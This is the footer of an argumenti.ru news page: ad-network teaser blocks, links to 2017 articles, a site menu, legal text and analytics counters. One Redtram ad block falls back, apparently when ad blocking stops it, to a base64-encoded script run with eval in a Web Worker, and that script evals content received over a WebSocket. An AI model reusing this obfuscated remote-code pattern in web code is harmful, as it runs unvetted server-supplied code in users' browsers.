		<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14114">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14114/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->




		</noindex>
						
		
		<div id="lx_561097"></div>
<script type="text/javascript">(function(){var j=183738,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("src","http://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script>
	


		
<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10167">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/f/10167.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>



<h2 class="namerub"><span class="rem">//</span>Новости advert.mirtesen.ru</h2>
<div id="smi2adblock_81549"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.advert.mirtesen.ru/data/js/81549.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>





		
		
		
		<!---->
			
			


		<h4 class="namerub"><span class="rem">//</span>Читайте также</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/society/2017/06/539698?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/6e122b02eee6be77a244d0754ab6268b.jpg" alt="Путин призвал российских выпускников не бояться своих амбиций" /></a>
						<a href="http://argumenti.ru/society/2017/06/539698?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Путин призвал российских выпускников не бояться своих амбиций</a>
		</li>
			<li>
							<a href="http://argumenti.ru/live/2017/05/532841?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/tabloid/265a1dd786a4c7a41a7f9e3eb42afda8.jpg" alt="«Навальный должен был быть убит еще в декабре 2011 года...»" /></a>
						<a href="http://argumenti.ru/live/2017/05/532841?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">«Навальный должен был быть убит еще в декабре 2011 года...»</a>
		</li>
			<li>
							<a href="http://argumenti.ru/politics/n595/539529?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/7005a02aa3cd6308ceb5c56d3a48a512.jpg" alt="Федеральное собрание не должно быть филиалом конгресса США" /></a>
						<a href="http://argumenti.ru/politics/n595/539529?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Федеральное собрание не должно быть филиалом конгресса США</a>
		</li>
	</ul>
		
		



<!-- R-50615-1 Яндекс.RTB-блок  -->
<div id="yandex_ad_R-50615-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-50615-1",
                renderTo: "yandex_ad_R-50615-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>						<h2 class="namerub"><span class="rem">//</span>Новости GlobalTeaser</h2>
<div id="teaser_13630"><a href="http://globalteaser.ru/" rel="nofollow">Новости GlobalTeaser</a></div>
<script type="text/javascript">document.write('<scr'+'ipt type="text/jav'+'ascript" async src="http://globalteaser.ru/show/?block_id=13630&r='+escape(document.referrer)+'&'+Math.round(Math.random()*100000)+'"></scr'+'ipt>');</script>


<h2 class="namerub"><span class="rem">//</span>Новости СМИ2</h2>
<div id="smi2adblock_72157"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/72157.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>


<h2 class="namerub"><span class="rem">//</span>Новости Lentainform.com</h2>
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN13735" class="news-block-magick">
    <div id="LentaInformPreloadN13735">
                <a href="http://lentainform.com/" target="_blank" rel="nofollow">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN13735")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN13735");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13735;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/a/r/argumenti.ru.13735.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->		
		
			
			
		<h2 class="namerub"><span class="rem">//</span>Новости Redtram</h2>
<script id="r34279" type="text/javascript">
    (function() {
        var worker34279,
            tickerID = 34279,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ru.redtram.com/n4p/0/34/ticker_34279.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vbjRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

                function runExternalMessage(data) {
                    worker34279.postMessage(data);
                }

                worker34279 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker34279.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker34279.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>			
					

		
		
		




	<div id="parthers_link"><a href="http://www.argumenti.ru/parthers">Новости партнеров</a>&nbsp;/<a href="http://www.argumenti.ru/info" rel="nofollow">Информация</a></div>
		</div>	    <center>
<a href="https://goo.gl/4hCiMx" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/685.gif" width="600" height="90" alt="sungrado"  border="0" /></a>
</center>	<div class="our_partners">
	<div>
		<h5 class="namerub" style="text-align:left;"><span class="rem">//</span>Наши партнеры</h5>
													</div>
</div>
			<footer>


		<div class="foot_menu"><div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics">Политика</a></li>
			<li><a href="http://argumenti.ru/economics">Экономика</a></li>
			<li><a href="http://argumenti.ru/society">Общество</a></li>
			<li><a href="http://argumenti.ru/world">В мире</a></li>
			<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
			<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
			<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
			<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
			<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
			<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
			<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
			<li><a style="color:red;"  href="http://argumenti.ru/sport">Спорт</a></li>
		</ul>
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/crime">Криминал</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
			<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/health">Здоровье</a></li>
			<li><a href="http://argumenti.ru/history">История</a></li>
			<li><a href="http://argumenti.ru/education">Образование</a></li>
			<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
			<li><a href="http://argumenti.ru/army">Армия</a></li>
			<li><a href="http://argumenti.ru/na">Нацакцент</a></li>
			<li><a href="http://argumenti.ru/novoe_pokolenie">Новое поколение</a></li>
			<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
			<li><a style="color:red;" href="http://argumenti.ru/charity">Сможем вместе</a></li>
		</ul>
</div></div>
	
	

<div class="footer_line">



	<div id="logo_footer">
		<!--noindex-->
			<div id="endline">
		<p style="margin-top:5px;">Возрастная категория сайта: <span class="plus18">18+</span><!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t44.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet--></p>
     </div>

	</div>

<!--noindex-->

	<div id="copy">
		<ul id="footer_menu">
			<li>Ваш город: /</li>
			<li><a href="http://argumenti.ru/reklama/internet.html" rel="nofollow">РЕКЛАМА</a> +7 (495) 981-68-36</li>
			<li><a href="http://argumenti.ru/pub/doc/an.pdf" target="_blank" rel="nofollow">Об издании</a></li>
		</ul>
		<p><a href="mailto:anonline@argumenti.ru" rel="nofollow">anonline@argumenti.ru</a></p>
		<p>Свободное использование в Интернет-пространстве текстов, фото и видеоматериалов, опубликованных на этом сайте, допускается при условии обязательного размещения гиперссылки на источник публикации www.argumenti.ru. Использование материалов в печатных СМИ допускается только с письменного разрешения редакции. 
					Сетевое издание "Аргументы неделi". Свидетельство о регистрации Эл № ФС77-60728 от 09 февраля 2015 г. выдано Федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор).
		


	</div>
	<div id = "rating">
<ul id="socnets" style="margin-bottom:48px;">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mm" target="_blank" href="http://my.mail.ru/community/argumenti" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
				<li><a class="in" target="_blank" href="http://instagram.com/argumenti.ru" rel="nofollow"></a></li>
			</ul>



<span class="counter">

<!-- Rating@Mail.ru logo -->
<a href="http://top.mail.ru/jump?from=1069168" rel="nofollow">
<img src="//top-fwz1.mail.ru/counter?id=1069168;t=479;l=1"
style="border:0;" height="31" width="88" alt="Рейтинг@Mail.ru" /></a>
<!-- //Rating@Mail.ru logo -->

</span>


<div id='top100counter' style="float:right"></div>
<script type="text/javascript">
var _top100q = _top100q || [];

_top100q.push(["setAccount", "1425289"]);
_top100q.push(["trackPageviewByLogo", document.getElementById("top100counter")]);


(function(){
var top100 = document.createElement("script"); top100.type = "text/javascript";

top100.async = true;
top100.src = ("https:" == document.location.protocol ? "https:" : "http:") + "//st.top100.ru/top100/top100.js";
var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(top100, s);
})();
</script>
<a style="float:right" target="_blank" href="http://www.rambler.ru/" rel="nofollow">"Партнер Рамблера"</a>




</div>
</div>

            
<!--<div id="footer_parthers"></div>-->

</footer>

</div>

<!--/noindex-->


<script type="text/javascript">
//<![CDATA[
yandex_direct_place = 'ya_direct';
yandex_partner_id = 50615;
yandex_site_bg_color = 'FFFFFF';
yandex_site_charset = 'utf-8';
yandex_ad_format = 'direct';
yandex_font_size = .75;
yandex_direct_type = 'vertical';
yandex_direct_limit = 5;
yandex_direct_header_bg_color = 'ECECEC';
yandex_direct_bg_color = 'ECECEC';
yandex_direct_border_color = 'FFFFFF';
yandex_direct_title_color = '000000';
yandex_direct_url_color = '666666';
yandex_direct_all_color = '000000';
yandex_direct_text_color = '000000';
yandex_direct_hover_color = '000000';
yandex_direct_favicon = true;
//]]>
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-11186859-1', 'auto');
  ga('send', 'pageview');

</script>




<!--<script type="text/javascript" src="http://an.yandex.ru/system/context.js"></script>-->


<!--// Rating@Mail.ru logo-->

<script async="async" src="https://w.uptolike.com/widgets/v1/zp.js?pid=631008" type="text/javascript"></script>


</script>
</body>
</html>